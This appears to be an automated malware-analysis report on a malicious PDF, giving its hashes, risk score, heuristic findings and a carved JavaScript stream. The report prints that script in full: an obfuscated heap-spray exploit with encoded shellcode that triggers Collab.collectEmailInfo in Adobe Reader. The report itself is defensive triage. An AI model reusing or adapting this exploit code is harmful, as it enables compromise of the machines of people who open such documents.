PDF malware analysis — malicious · b22fbd922fd791ea

MALICIOUS

PDF

208.8 KB Authoring application: Acrobat PDFMaker 7.0 for Word (via Acrobat Distiller 7.0 (Windows)) First seen: 2026-05-10

MD5: 39ac2cdbb628985ecf25217a612c7563 SHA-1: d4ac03db8a1bad107d72a8bcdb5c753b5687617f SHA-256: b22fbd922fd791ea5f1cf7a0017c5dcba94552d5a5cc22e05c56f69c80788a9d

110 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 0.9993

Heuristics 5

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY

PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/pdfx/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/photoshop/1.0/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0019_000.js`	pdf-javascript-stream	PDF /JS object 19 at offset 0x509	2792 bytes
SHA-256: `2205183566deb00070c1cb57cf118388ab5eb8da442f2e0a7f348693084671c4`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var sc;//ahlfah for(i=0;i<18000;i++) sc = sc+0x70; var unes=unescape function rep(count,what){ var v = ""; while (--count >= 0) v += what; return v; } var sc=unes("%u4241%u4142%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9"+ "\x25\x75EBFA\x25\x75E805\x25\x75FFEB\x25\x75FFFF"+ "%uF911%uF9F9%uA3F9%u72AC%u7815%u9D15%uF9FD%u72F9"+ "%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF"+ "%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06"+ "%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF"+ "%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791"+ "%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA"+ "%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601"+ "%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993"+ "%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD"+ "%uF901%u328D%uF993%uF993%uF993%uFD93%u8F06%u06BD"+ "%uEDAF%uBF70%u7AB1%uF901%u4C8D%uC178%uA9DC%uBFBD"+ "%uB772%u8CC5%u7854%uF941%uF9EB%uA9F9%uA99D%u8CBD"+ "%u7858%uFD41%uF9EB%u16F9%u1307%u8C57%u406C%uFFF9"+ "%uF9F9%u1578%uF1F9%uF9F9%uAEAF%u0972%u3F78%uEBE9"+ "%uF9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9"+ "%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608"+ "%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D"+ "%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589"+ "%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD"+ "%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9"+ "%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD"+ "%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5"+ "%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D"+ "%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72"+ "%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372"+ "\x25\x75FAE5\x25\x75C724\x25\x75FD72\x25\x75FA72\x25\x75123C\x25\x75CAFB\x25\x757239\x25\x75A62C"+ "%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC"); function start() { if (app.viewerVersion >= 7.0) { plin =rep(1124,unes("%u0b0b%u0028%u06eb%u06eb")) + unes("%u0b0b%u0028%u0aeb%u0aeb") + unes("%u4346%u4a4b") + rep(122,unes("%u0b0b%u0028%u06eb%u06eb")) + sc + rep(1256,unes("%u4a4b%u4748")); } else { blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc; bbk = unes("%u4242%u4242"); wap = 20+blah["\x6c\x65\x6e\x67\x74\x68"] while (bbk["\x6c\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk; fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap); bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["\x6c\x65\x6e\x67\x74\x68"]-wap); while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<0x40000) bk = bk+bk+fillbk; mm = new Array(); for (i=0;i<250;i++) mm[i] = bk + blah; plin = rep(8000, unes("\x25\x750a0a\x25\x750a0a")); } if (app.viewerVersion >= 6.0)//gakghfvlgfal { Collab["\x63\x6fll\x65\x63\x74\x45\x6d\x61\x69lInfo"]({subj:0,msg:plin}); } } var shaft = app.setTimeOut("start()",1200);

Open this report in the interactive analyzer, or submit your own file for analysis.